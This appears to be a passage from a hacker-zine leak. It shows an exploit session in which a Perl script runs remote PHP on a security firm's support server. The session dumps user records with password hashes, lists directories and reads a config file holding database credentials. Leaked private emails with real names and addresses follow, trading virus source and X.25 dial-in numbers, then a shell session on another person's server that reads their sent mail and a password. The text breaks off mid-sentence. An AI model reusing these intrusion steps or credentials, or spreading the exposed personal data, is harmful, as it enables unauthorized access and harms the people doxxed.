[*] Sending command $con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('Community', $con);$res=mysql_query('select * from impact_users', $con) or die('whh');mysql_close($con);if($res){echo('succ');while($row=mysql_fetch_assoc($res)){var_dump($row);echo('------');}}else{echo('failed');}
[*] Command sent, waiting for response
succarray(31) {
["pn_uid"]=>
string(1) "1"
["pn_name"]=>
string(0) ""
["pn_uname"]=>
string(9) "Anonymous"
["pn_email"]=>
string(0) ""
["pn_femail"]=>
string(0) ""
["pn_url"]=>
string(0) ""
["pn_user_avatar"]=>
string(9) "blank.gif"
["pn_user_regdate"]=>
string(10) "1058302436"
["pn_user_icq"]=>
string(0) ""
["pn_user_occ"]=>
string(0) ""
["pn_user_from"]=>
string(0) ""
["pn_user_intrest"]=>
string(0) ""
["pn_user_sig"]=>
string(0) ""
["pn_user_viewemail"]=>
string(1) "0"
["pn_user_theme"]=>
string(1) "0"
["pn_user_aim"]=>
string(0) ""
["pn_user_yim"]=>
string(0) ""
["pn_user_msnm"]=>
string(0) ""
["pn_pass"]=>
string(0) ""
["pn_storynum"]=>
string(2) "10"
["pn_umode"]=>
string(0) ""
["pn_uorder"]=>
string(1) "0"
["pn_thold"]=>
string(1) "0"
["pn_noscore"]=>
string(1) "0"
["pn_bio"]=>
string(0) ""
["pn_ublockon"]=>
string(1) "0"
["pn_ublock"]=>
string(0) ""
["pn_theme"]=>
string(0) ""
["pn_commentmax"]=>
string(4) "4096"
["pn_counter"]=>
string(1) "0"
["pn_timezone_offset"]=>
string(4) "12.0"
}
------array(31) {
["pn_uid"]=>
string(1) "2"
["pn_name"]=>
string(14) "Bruno Acselrad"
["pn_uname"]=>
string(5) "buchu"
["pn_email"]=>
string(22) "buchu@coresecurity.com"
["pn_femail"]=>
string(0) ""
["pn_url"]=>
string(27) "http://www.coresecurity.com"
["pn_user_avatar"]=>
string(9) "blank.gif"
["pn_user_regdate"]=>
string(10) "1058302436"
["pn_user_icq"]=>
string(0) ""
["pn_user_occ"]=>
string(0) ""
["pn_user_from"]=>
string(0) ""
["pn_user_intrest"]=>
string(0) ""
["pn_user_sig"]=>
string(0) ""
["pn_user_viewemail"]=>
string(1) "0"
["pn_user_theme"]=>
string(1) "0"
["pn_user_aim"]=>
string(0) ""
["pn_user_yim"]=>
string(0) ""
["pn_user_msnm"]=>
string(0) ""
["pn_pass"]=>
string(32) "922ed3056a156d0c2a868ae91c735410"
["pn_storynum"]=>
string(2) "10"
["pn_umode"]=>
string(0) ""
["pn_uorder"]=>
string(1) "0"
["pn_thold"]=>
string(1) "0"
["pn_noscore"]=>
string(1) "0"
["pn_bio"]=>
string(0) ""
["pn_ublockon"]=>
string(1) "0"
["pn_ublock"]=>
string(0) ""
["pn_theme"]=>
string(7) "Core-v1"
["pn_commentmax"]=>
string(4) "4096"
["pn_counter"]=>
string(1) "0"
["pn_timezone_offset"]=>
string(4) "12.0"
}
------array(31) {
["pn_uid"]=>
string(1) "3"
["pn_name"]=>
string(0) ""
["pn_uname"]=>
string(4) "Test"
["pn_email"]=>
string(16) "buchu@corest.com"
["pn_femail"]=>
string(0) ""
["pn_url"]=>
string(0) ""
["pn_user_avatar"]=>
string(9) "blank.gif"
["pn_user_regdate"]=>
string(10) "1059683345"
["pn_user_icq"]=>
string(0) ""
["pn_user_occ"]=>
string(0) ""
["pn_user_from"]=>
string(0) ""
["pn_user_intrest"]=>
string(0) ""
["pn_user_sig"]=>
string(0) ""
["pn_user_viewemail"]=>
string(1) "0"
["pn_user_theme"]=>
NULL
["pn_user_aim"]=>
string(0) ""
["pn_user_yim"]=>
string(0) ""
["pn_user_msnm"]=>
string(0) ""
["pn_pass"]=>
string(32) "c6c7b5e75856d69c00449ad9153f541c"
["pn_storynum"]=>
string(2) "10"
["pn_umode"]=>
string(0) ""
["pn_uorder"]=>
string(1) "0"
["pn_thold"]=>
string(1) "0"
["pn_noscore"]=>
string(1) "0"
["pn_bio"]=>
string(0) ""
["pn_ublockon"]=>
string(1) "0"
["pn_ublock"]=>
string(0) ""
["pn_theme"]=>
string(0) ""
["pn_commentmax"]=>
string(4) "4096"
["pn_counter"]=>
string(1) "0"
["pn_timezone_offset"]=>
string(4) "12.0"
}
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "echo getcwd();"
[*] Sending command echo getcwd();
[*] Command sent, waiting for response
/htdocs/impact
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../../var')){while((fa
lse!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);"
[*] Sending command if($dir=opendir('../../var')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir);
[*] Command sent, waiting for response
.---..---run---log---
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../../var/run')){while
((false!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);"
[*] Sending command if($dir=opendir('../../var/run')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir);
[*] Command sent, waiting for response
.---..---mysql---
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../../run')){while((fa
lse!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);"
[*] Sending command if($dir=opendir('../../run')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir);
[*] Command sent, waiting for response
.---..---mysql---
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../')){while((false!==
(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);"
[*] Sending command if($dir=opendir('../')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir);
[*] Command sent, waiting for response
.---..---impact---index.html---oss---impact_devel---impact_new---default---
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../oss/')){while((fals
e!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);"
[*] Sending command if($dir=opendir('../oss/')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir);
[*] Command sent, waiting for response
.---..---index.html---pcapy---repo---impacket---inlineegg---msyslog---images---projects---index.bk.html---(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../oss/impacket/')){w
hile((false!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);"
[*] Sending command if($dir=opendir('../oss/impacket/')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir);
[*] Command sent, waiting for response
.---..---LICENSE---ping.py---sniff.py---sniffer.py---split.py---tracer.py---rpcdump.py---samrdump.py---(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../oss/impacket/LICENS
E')){while((false!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);"
[*] Sending command if($dir=opendir('../oss/impacket/LICENSE')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir);
[*] Command sent, waiting for response
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "readfile('../impact_devel/config.php');"
[*] Sending command readfile('../impact_devel/config.php');
[*] Command sent, waiting for response
<?php
// $Id: config.php,v 1.10 2003/06/29 23:16:24 markwest Exp $
// ----------------------------------------------------------------------
// PostNuke Content Management System
// Copyright (C) 2001 by the PostNuke Development Team.
// http://www.postnuke.com/
// ----------------------------------------------------------------------
// Based on:
// PHP-NUKE Web Portal System - http://phpnuke.org/
// Thatware - http://thatware.org/
// ----------------------------------------------------------------------
// LICENSE
//
// This program is free software; you can redistribute it and/or
// modify it under the terms of the GNU General Public License (GPL)
// as published by the Free Software Foundation; either version 2
// of the License, or (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// To read the license please visit http://www.gnu.org/copyleft/gpl.html
// ----------------------------------------------------------------------
// Original Author of file: Everyone
// Purpose of file: Configure database
// ----------------------------------------------------------------------
// ----------------------------------------------------------------------
// Database & System Config
//
// dbtype: type of database, currently only mysql
// dbhost: MySQL Database Hostname
// dbuname: MySQL Username
// dbpass: MySQL Password
// dbname: MySQL Database Name
// system: 0 for Unix/Linux, 1 for Windows
// encoded: 0 for MySQL information unenccoded
// 1 for encoded
// ----------------------------------------------------------------------
//
$pnconfig['dbtype'] = 'mysql';
$pnconfig['dbtabletype'] = 'myisam';
$pnconfig['dbhost'] = '127.0.0.1';
$pnconfig['dbuname'] = 'cm9vdA==';
$pnconfig['dbpass'] = 'NzNsaCx4';
$pnconfig['dbname'] = 'Community';
$pnconfig['system'] = '0';
$pnconfig['prefix'] = 'impact';
$pnconfig['encoded'] = '1';
// ----------------------------------------------------------------------
// For debugging (Pablo Roca)
//
// $debug - debugger windows active
// 0 = No
// 1 = Yes
//
// $debug_sql - show SQL in lens debug
// 0 = No
// 1 = Yes
// ----------------------------------------------------------------------
GLOBAL $pndebug;
$pndebug['debug'] = 0;
$pndebug['debug_sql'] = 0;
// ----------------------------------------------------------------------
// You have finished configuring the database. Now you can start to
// change your site settings in the Administration Section.
//
// Thanks for choosing PostNuke.
// ----------------------------------------------------------------------
// ----------------------------------------------------------------------
// if there is a personal_config.php in the folder where is config.php
// we add it. (This HAS to be at the end, after all initialization.)
// ----------------------------------------------------------------------
if (@file_exists("personal_config.php"))
{ include("personal_config.php"); }
// ----------------------------------------------------------------------
// Make config file backwards compatible (deprecated)
// ----------------------------------------------------------------------
extract($pnconfig, EXTR_OVERWRITE);
?>
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../impact_new/')){while((false!==(\$file=readdir(\$dir)))){if(is_writable('../im
pact_new/'.\$file)){echo(\$file.'-y--');}else{echo(\$file.'---');}}
}closedir(\$dir);"
[*] Sending command if($dir=opendir('../impact_new/')){while((false!==($file=readdir($dir)))){if(is_writable('../impact_new/'.$file)){echo($file.'-y--');}else{echo($file.'---');}}}closedir($dir);
[*] Command sent, waiting for response
.---..---
(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../default/')){while((false!==(\$file=readdir(\$dir)))){if(is_writable('../default/'.\$file)){echo(\$file.'-y--');}else{echo(\$file.'---');}}}close
dir(\$dir);"
[*] Sending command if($dir=opendir('../default/')){while((false!==($file=readdir($dir)))){if(is_writable('../default/'.$file)){echo($file.'-y--');}else{echo($file.'---');}}}closedir($dir);
[*] Command sent, waiting for response
.---..---index.html---
w0w, th4tz 3mb4r4zz1ng.
13.txt -~-~-~ 1f b4b0 c4nt h4q th3m...
3y3 gu3zz w3 muzt! l3tz r0ll th0z3 gm41lz...
gui nmap
Aftermath
to lordcamel
Hide options 12/7/04
From: Aftermath <aftermath.thegreat@gmail.com> Mailed-By: gmail.com
Reply-To: Aftermath <aftermath.thegreat@gmail.com>
To: lordcamel@gmail.com
Date: Dec 7, 2004 3:20 PM
Subject: gui nmap
asdf
guinmap.rar
34K Download
-~-~-~-~-~-~ c4m3l n33dz th3 p0w3r 0f th3 gu1 -~-~-~-~-~-~
el8 wishlist Inbox
Aftermath
to cripto, jbl
Hide options 5/9/05
From: Aftermath <aftermath.thegreat@gmail.com> Mailed-By: gmail.com
Reply-To: Aftermath <aftermath.thegreat@gmail.com>
To: cripto@subterrain.net, jbl@subterrain.net
Date: May 9, 2005 4:40 PM
Subject: el8 wishlist
Hi. I read your wishlist from a few years ago in el8 ish one.
I have info on a few of the items you requested, spicificly the x25
info. The info I have is on the canadian datapac system
mail me back if you are interested
Reply Reply to all Forward
Justin Lundy
to me
More options 5/9/05
sure pgp it and send it over ;-)
- Show quoted text -
On 5/9/05, Aftermath <aftermath.thegreat@gmail.com> wrote:
> Hi. I read your wishlist from a few years ago in el8 ish one.
>
> I have info on a few of the items you requested, spicificly the x25
> info. The info I have is on the canadian datapac system
>
> mail me back if you are interested
>
Reply Forward
Aftermath
to Justin
More options 5/9/05
- Show quoted text -
On 5/9/05, Justin Lundy <jblnyc@gmail.com> wrote:
> sure pgp it and send it over ;-)
>
> On 5/9/05, Aftermath <aftermath.thegreat@gmail.com> wrote:
> > Hi. I read your wishlist from a few years ago in el8 ish one.
> >
> > I have info on a few of the items you requested, spicificly the x25
> > info. The info I have is on the canadian datapac system
> >
> > mail me back if you are interested
> >
>
this is going to sound really gay, but pgp wont install on the
computers I use. I use collage computers and on re-set all installed
shit gets wiped. Its really gay.
But do you trust hushmail or some other way to encrypt?
Reply Forward
Justin Lundy
to me
More options 5/9/05
go ahead and send it over without encryption its no biggie
- Show quoted text -
On 5/9/05, Aftermath <aftermath.thegreat@gmail.com> wrote:
> On 5/9/05, Justin Lundy <jblnyc@gmail.com> wrote:
> > sure pgp it and send it over ;-)
> >
> > On 5/9/05, Aftermath <aftermath.thegreat@gmail.com> wrote:
> > > Hi. I read your wishlist from a few years ago in el8 ish one.
> > >
> > > I have info on a few of the items you requested, spicificly the x25
> > > info. The info I have is on the canadian datapac system
> > >
> > > mail me back if you are interested
> > >
> >
>
> this is going to sound really gay, but pgp wont install on the
> computers I use. I use collage computers and on re-set all installed
> shit gets wiped. Its really gay.
>
> But do you trust hushmail or some other way to encrypt?
>
Reply Forward
Aftermath
to Justin
More options 5/11/05
Alright, here's the cooler ones i've stumbled upon:
20200131
Solstice X.29 Terminal Service
Administrator @ (613) 785-0443
big "keep out" intro banner
2520 0080 <- asks for username and password (in french as well)
4280 0483 <- RAPIDNET services. Something to do with cars or
something? links to other computers that need usernames/passwords.
4370 0356 <- Pyramid Technology Data Center OSx
4270 0119 <- asks for a password (just a password). Too many bad
tries and it locks you out for a minute (must be something important!)
8340 1372 <- one fucked up system. Sends back random characters slowly
Hey I have a question. What is that ADM software that you talked
about? Is that some sort of x25 brute forcing software?
- Show quoted text -
-~-~-~-~-~-~ jbl c0mm1tz cr1m3z c4uz3 H3 1Z 4 CR1M1N4L! -~-~-~-~-~-~
trade
Aftermath
to mark.aben
Hide options 6/18/05
From: Aftermath <aftermath.thegreat@gmail.com> Mailed-By: gmail.com
Reply-To: Aftermath <aftermath.thegreat@gmail.com>
To: mark.aben@gmail.com
Date: Jun 18, 2005 1:55 PM
Subject: trade
here :)
m00seahouse-0.1.tar.gz
12K Download
-~-~-~-~-~-~ th1z k1d h4z m0r3 0d4yz th4n 4ll 0f ESOH c0mb1n3d! -~-~-~-~-~-~
trade
Aftermath
to trelish173
Hide options 6/18/05
From: Aftermath <aftermath.thegreat@gmail.com> Mailed-By: gmail.com
Reply-To: Aftermath <aftermath.thegreat@gmail.com>
To: trelish173@yahoo.com
Date: Jun 18, 2005 1:51 PM
Subject: trade
2 attachments ó Download all attachments
0day_vb_source._virus.zip
6K Download
m00seahouse-0.1.tar.gz
12K Download
-~-~-~-~-~-~ dr1p dr1p dr1p, c4ll th3 plumb3r.. w3 g0t a l34k! -~-~-~-~-~-~
Article Submission
Cloakin Dagger
to newsroom
Hide options 12/3/05
From: Cloakin Dagger <psud0c0d3@gmail.com> Mailed-By: gmail.com
To: newsroom@terracestandard.com
Date: Dec 3, 2005 4:11 PM
Subject: Article Submission
I have attached a article in .txt format along with this Email. I choose to
remain annonymous due to the nature of this article.
If you are going to read it in word pad or note pad, don't forget to turn word
wrap on.
If you wish, and if the article is published, you can change the by-line to
"annonymous" or anything you choose.
New Legalization Ideas.txt
4K View Download
-~-~-~-~-~-~ n0t 4n0nym0uz n0w -~-~-~-~-~-~
k-1ine submission
Aftermath
to theclone
Hide options 8:56 pm (4 hours ago)
From: Aftermath <aftermath.thegreat@gmail.com> Mailed-By: gmail.com
To: theclone@hackcanada.com
Date: Feb 7, 2006 8:56 PM
Subject: k-1ine submission
Hey Clone.
I dont know if you remember, but I told you I was working on another virus text.
I've been working on it on and off for almost a year now.
Its finaly done. I finished it last night, right before my computer crashed and
refused to start again. Luckaly I saved it to my usb drive before that happend.
I hope you dont mind me going under the name "TwoTwenty" for this article, I
just dont want my handle "Aftermath" to be syonomus with viruses.
-Aftermath
VB_source_code_virus_revisited.txt
70K View Download
-~-~-~-~-~-~ pl41n t3xt 3m41lz 4r3 v3ry s4f3 f0r th3 4n0nym0uz! -~-~-~-~-~-~
Aftermath
to b9u4ea
Hide options Apr 4
From: Aftermath <aftermath.thegreat@gmail.com> Mailed-By: gmail.com
To: b9u4ea@gmail.com
Date: Apr 4, 2006 2:37 AM
Subject: BoW hackers and Edmonton
hey buddy, i dono if this is the u4ea from BoW, but i heard it was, and that you
were in Edmonton. If you ever want to meet up with some serioulsy cool phreaks
in E-town, give me a holler back. These guys I know arn't lame. they are the
real deal.
-Aftermath
-~-~-~-~-~-~ BoW w0uld fuqn d3str0y y0u! -~-~-~-~-~-~
cdej song
Aftermath
to lozcarenator
Hide options Mar 24
From: Aftermath <aftermath.thegreat@gmail.com> Mailed-By: gmail.com
To: lozcarenator@gmail.com
Date: Mar 24, 2006 5:04 PM
Subject: cdej song
Lyrics go:
this is a dangrous group.. groups that we are dealing with
... and ...
it was a nightmare
its about cdej being so elite that the whole planet pjeerz and thinks its a
nightmare taht cdej rux so much and is very dangerous
made with fruity loops
it was a nightmare.mp3
4416K Download
-~-~-~-~ cdej n33dz t0 g3t th3m s0m3 sk1llz.. 0r rm -rf / w1ll c0m3. -~-~-~-~
s
Aftermath
to c
Hide options Apr 21
From: Aftermath <aftermath.thegreat@gmail.com> Mailed-By: gmail.com
To: c@cdej.org
Date: Apr 21, 2006 1:33 AM
Subject: s
hey you should ask bob if you can use this before publishing it.. all the good
code in it is his.
zine.txt
76K View Download
-~-~-~-~-~-~ w0uld cdej lyk3 t0 us3 th1z 4rt1cl3 4sw3ll? fuqn l00z3rz. -~-~-~-~-~-~
14.txt -~-~-~ majestic 4x3d.
l34rn t0 h4q. fuqn l4m3r. y0u r 4x3d!
majestic@nox ~ $ id
uid=1110(majestic) gid=100(users) groups=100(users)
majestic@nox ~ $ uname -a
Linux nox 2.6.11-gentoo-r11 #1 Tue Jun 14 12:34:43 EDT 2005 i686 AMD Athlon(tm) XP 2700+ AuthenticAMD GNU/Linux
majestic@nox ~ $ ls -al
total 31
drwx------ 4 majestic users 360 Oct 7 22:33 .
drwxr-xr-x 96 root root 2520 Jan 15 12:01 ..
-rwxr-xr-x 1 majestic users 812 Nov 28 2003 ._cfg0000_.bashrc
-rwxr-xr-x 1 majestic users 3741 Nov 16 18:36 .bash_history
-rwxr-xr-x 1 majestic users 232 Nov 28 2003 .bash_profile
-rwxr-xr-x 1 majestic users 806 Nov 28 2003 .bashrc
drwx------ 2 majestic users 80 Oct 7 22:22 .ssh
-rwxr-xr-x 1 majestic users 1466 Nov 28 2003 .tcsh.config
-rwxr-xr-x 1 majestic users 7549 Nov 29 2004 .viminfo
-rw-r--r-- 1 majestic users 0 Nov 29 2004 .viminfo.tmp
drwx------ 24 majestic users 728 Nov 6 15:56 Maildir
lrwxrwxrwx 1 majestic users 46 Jan 29 2005 cgi-bin -> /mg2root/web/electroindustrial.mg2.org/cgi-bin
lrwxrwxrwx 1 majestic users 43 Jan 29 2005 www -> /mg2root/web/electroindustrial.mg2.org/html
majestic@nox ~ $ w
21:26:01 up 33 days, 23:34, 3 users, load average: 0.08, 0.05, 0.04
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
corrupt pts/0 Sun11 33:24m 0.00s 0.01s sshd: corrupt [priv]
root pts/2 13Dec05 7days 0.01s 0.01s -bash
tony pts/3 05Jan06 11days 0.40s 0.40s vim main_page.tt2
majestic@nox ~ $ cd Maildir
majestic@nox ~/Maildir $ ls -al
total 198
drwx------ 24 majestic users 728 Nov 6 15:56 .
drwx------ 4 majestic users 360 Oct 7 22:33 ..
drwx------ 6 majestic users 256 Mar 24 2004 .Drafts
drwx------ 6 majestic users 256 Dec 18 2004 .K-7
drwx------ 6 majestic users 256 Dec 20 2004 .MCBG
drwx------ 6 majestic users 256 Dec 20 2004 .Misc
drwx------ 6 majestic users 256 Feb 22 2005 .NTheory
drwx------ 6 majestic users 256 Dec 20 2004 .Paypal
drwx------ 6 majestic users 256 Dec 31 2004 .Phreak
drwx------ 6 majestic users 256 Feb 22 2005 .Phreaker
drwx------ 6 majestic users 256 May 8 2004 .Read these
drwx------ 6 majestic users 256 Jun 15 2005 .Sent
drwx------ 6 majestic users 256 Feb 22 2005 .Stanaphone
drwx------ 6 majestic users 256 Jun 21 2005 .Trash
drwx------ 6 majestic users 256 Dec 20 2004 .amazon
drwx------ 6 majestic users 256 Dec 20 2004 .douwd
drwx------ 6 majestic users 256 Dec 20 2004 .mg2
drwx------ 6 majestic users 256 Dec 17 2004 .natas
drwx------ 6 majestic users 256 Jun 14 2005 .nokia
drwx------ 6 majestic users 256 Feb 22 2005 .voipjet
drwx------ 2 majestic users 48 Jun 21 2005 courierimapkeywords
-rwxr-xr-x 1 majestic users 230 Feb 22 2005 courierimapsubscribed
-rw-r--r-- 1 majestic users 55938 Nov 6 15:56 courierimapuiddb
-rwxr-xr-x 1 majestic users 608 Mar 24 2004 courierpop3dsizelist
drwxrwx--- 2 majestic majestic 88608 Nov 6 15:56 cur
drwxrwx--- 2 majestic majestic 48368 Jan 16 20:37 new
drwxrwx--- 2 majestic majestic 48 Jan 16 20:37 tmp
majestic@nox ~/Maildir $ cd .Sent/cur
majestic@nox ~/Maildir/.Sent/cur $ cat *
Received: from 141.217.174.135
(SquirrelMail authenticated user majestic)
by secure.mg2.org with HTTP;
Thu, 19 Feb 2004 13:51:01 -0500 (EST)
Message-ID: <1804.141.217.174.135.1077216661.squirrel@secure.mg2.org>
In-Reply-To: <000801c3f295$6f28ce60$d4349144@cg.shawcable.net>
References: <000801c3f295$6f28ce60$d4349144@cg.shawcable.net>
Date: Thu, 19 Feb 2004 13:51:01 -0500 (EST)
Subject: Re:
From: majestic@mg2.org
To: "Paul Wolfenden" <paulwolfenden@shaw.ca>
User-Agent: SquirrelMail/1.4.2
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3
Importance: Normal
Return-Receipt-To: majestic@mg2.org
YO,
I am working on a newer porn site .. just for fun...
http://thefiesta.smutstars.com
Check it and get back to me! Anything you wanna submit throw me the URL
and I can give you props lata!
Received: from 141.217.41.203
(SquirrelMail authenticated user majestic)
by secure.mg2.org with HTTP;
Thu, 13 May 2004 22:29:45 -0400 (EDT)
Message-ID: <2068.141.217.41.203.1084501785.squirrel@secure.mg2.org>
Date: Thu, 13 May 2004 22:29:45 -0400 (EDT)
Subject: Datu's
From: majestic@mg2.org
To: nyphonejacks@yahoo.com
User-Agent: SquirrelMail/1.4.2
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3
Importance: Normal
I can't thank you enough brother ... Please feel free to contact me about
any Datu News, as you are one of the best on my page... Please stay in
touch, as i was a follower of ANTIVERIZON! You'll always have a place for
txt files on my site!
Majestic ...
Please read these:
http://majestic.douwd.org/Sass/Majestic.txt
http://majestic.douwd.org/nyphonejacks/Sass/Majesti-Grey.txt
umm keep it to your eyes only ... but yeah...
Received: from 141.217.41.212
(SquirrelMail authenticated user majestic)
by secure.mg2.org with HTTP;
Fri, 27 Aug 2004 15:35:12 -0400 (EDT)
Message-ID: <1826.141.217.41.212.1093635312.squirrel@secure.mg2.org>
In-Reply-To: <935acd92040826220060410c5b@mail.gmail.com>
References: <dd997ffc040826142429b5b890@mail.gmail.com>
<935acd92040826220060410c5b@mail.gmail.com>
Date: Fri, 27 Aug 2004 15:35:12 -0400 (EDT)
Subject: Re: luna.hbx.us
From: majestic@mg2.org
To: "Michael Wally" <hairball@gmail.com>
User-Agent: SquirrelMail/1.4.2
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3
Importance: Normal
I tried this with my username and got nothing ...
I am going to try some more, if you can, please check on this please .. I
have the html and image folder in the public_html file folder, but can't
seem to ge tit moving!
http://luna.hbx.us/~username/
Received: from 141.217.41.235
(SquirrelMail authenticated user majestic);
by secure.mg2.org with HTTP;
Mon, 20 Dec 2004 14:47:07 -0500 (EST)
Message-ID: <1857.141.217.41.235.1103572027.squirrel@141.217.41.235>
Date: Mon, 20 Dec 2004 14:47:07 -0500 (EST)
Subject: sql pass
From: majestic@mg2.org
To: majestic@mg2.org
User-Agent: SquirrelMail/1.4.3a
X-Mailer: SquirrelMail/1.4.3a
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
<Corrupt_> Password for majestic set to QwOCAVio
majestic@nox ~/Maildir/.Sent/cur $ cd /mg2root/web/
majestic@nox /mg2root/web $ ls -al
total 3
drwxr-xr-x 59 root root 1984 Jan 2 21:31 .
drwxr-xr-x 8 root root 216 Jun 2 2005 ..
drwxr-s--- 7 admiral webserv 176 Jul 9 2003 admiral.mg2.org
drwxr-s--- 7 benk webserv 176 Nov 18 2004 benk.mg2.org
drwxr-s--- 8 root webserv 200 Aug 20 2002 bizkuts.mg2.org
drwxr-s--- 6 716 webserv 176 Sep 20 17:03 blujazz.org
drwxr-sr-x 8 corrupt webserv 200 Jan 11 2004 bot.mg2.org
drwxr-s--- 7 brandon webserv 176 May 12 2005 brandon.mg2.org
drwxr-s--- 7 farming webserv 176 Aug 26 2003 cap.mg2.org
drwxr-s--- 11 corrupt webserv 280 Jan 18 2005 cma.mg2.org
drwxr-s--- 7 dante8 webserv 176 Dec 30 2003 dante8.mg2.org
drwxr-s--- 8 corrupt webserv 240 Oct 30 01:00 davtest.mg2.org
drwxr-xr-x 9 deftekno deftekno 224 May 22 2003 decypher.org
drwxr-s--- 12 deftekno webserv 376 Apr 19 2005 deftekno.mg2.org
drwxr-s--- 7 delvis webserv 200 Feb 8 2005 delvis.mg2.org
drwxr-s--- 7 1059 webserv 176 Jul 12 2004 dew.mg2.org
drwxr-s--- 7 majestic webserv 176 Jun 21 2005 electroindustrial.mg2.org
drwxr-xr-x 8 860 chui101 200 Jul 29 2003 filter.mg2.org
drwxr-s--- 10 q webserv 248 Dec 4 2004 girls-suck.net
drwxr-s--- 8 nick webserv 200 Aug 20 2002 gypsy.mg2.org
drwxr-s--- 8 jacob webserv 200 Aug 20 2002 jacob.mg2.org
drwxr-sr-x 10 cent webserv 456 May 9 2005 jeek.net
drwxr-s--- 7 corrupt webserv 232 Apr 20 2005 katy.mg2.org
drwxr-s--- 3 root webserv 80 Aug 20 2002 lost+found
drwxr-x--x 6 cent webserv 208 Apr 20 2005 malk.jeek.net
drwxr-sr-x 9 corrupt webserv 336 Dec 14 2004 michael.gregorowicz.com
drwxr-xr-x 8 nin webserv 200 Mar 6 2004 nin.mg2.org
drwxr-s--- 8 q webserv 296 Sep 16 21:19 q.mg2.org
drwxr-s--- 8 716 webserv 200 Aug 20 2002 rasta.mg2.org
drwxr-s--- 8 reflecks webserv 200 Aug 20 2002 reflecks.mg2.org
drwxrwxrwx 8 shell webserv 200 Feb 9 2004 reserve.mg2.org
drwxr-s--- 17 secweb secweb 1984 Jan 15 11:58 secure.mg2.org
drwxr-s--- 8 shaan webserv 264 Aug 13 21:17 shaan.mg2.org
drwxr-s--- 9 tracks webserv 264 Oct 21 2004 tracks.mg2.org
drwxr-s--- 7 ucbs webserv 176 Apr 2 2004 ucbs.mg2.org
drwxr-s--- 8 wuf webserv 240 Oct 18 01:00 wakeupfuckers.com
drwxr-sr-x 9 swassef webserv 264 Nov 17 11:16 wassef.net
drwxr-s--- 8 wedding webserv 240 Oct 18 01:00 wedding.mg2.org
drwxr-s--- 6 corrupt webserv 152 Aug 25 01:00 whatever.mg2.org
drwxr-s--- 7 nick webserv 176 Aug 20 2002 wmls.mg2.org
drwxr-s--- 7 wwjp4u webserv 176 Jan 9 2004 wwjp4u.mg2.org
drwxr-s--- 6 deftekno webserv 152 Aug 21 01:00 www.b-evil.com
drwxr-s--- 8 binary webserv 200 Sep 23 11:30 www.binarydetroit.com
drwxr-s--- 12 xroads webserv 352 Jul 5 2005 www.crossroadsofmichigan.org
drwxr-s--- 6 dragan webserv 152 Oct 28 01:00 www.dragan.org
drwxr-xr-x 8 ogre ogre 200 Nov 23 15:02 www.dragontear.org
drwxr-s--- 7 bleach webserv 176 Oct 25 2004 www.exodusls.com
drwxr-s--- 6 tgif webserv 152 Oct 29 01:00 www.fridaysrule.org
drwxr-xr-x 10 corrupt webserv 296 Oct 21 2004 www.gregorowicz.com
drwxr-s--- 8 tony webserv 240 Jan 3 01:00 www.lessthanthree.com
drwxr-s--- 9 majeo webserv 248 Jan 7 2004 www.majeo.ro
drwxr-s--- 8 corrupt webserv 240 Nov 9 01:00 www.mg2.org
drwxr-s--- 8 analog38 webserv 200 Aug 19 15:48 www.myonelastchance.com
drwxr-s--- 8 anvil webserv 200 Oct 24 12:21 www.plastercine.org
drwxr-s--- 9 sica webserv 224 Oct 27 2004 www.redflux.com
drwxr-s--- 6 jacob webserv 152 Sep 1 01:00 www.sleepforever.com
drwxr-s--- 10 soko webserv 312 Nov 4 01:00 www.soko2000.com
drwxr-s--- 6 brandon webserv 152 Sep 3 10:49 www.toaster-of-doom.com
drwxr-s--- 7 zcqw4a1 webserv 176 Feb 17 2004 zcq.mg2.org
f0rg0t 2l4m32h4x.mg2.org
15.txt -~-~-~ a pr0p0s4l 4 3b4y3rz
d34r c0nsum3rz 0f th3 1nt3rn3t,
th1s 1s h0no, w3 4r3 4 gr0up 0f 3 h4ck3rz wh0 r34lly w1sh t0 3xt3nd
0ur rm'1ng p0w3r. 1n0rd3r t0 d0 th1z w3 n33d s0m3 h3lp!!! us1ng
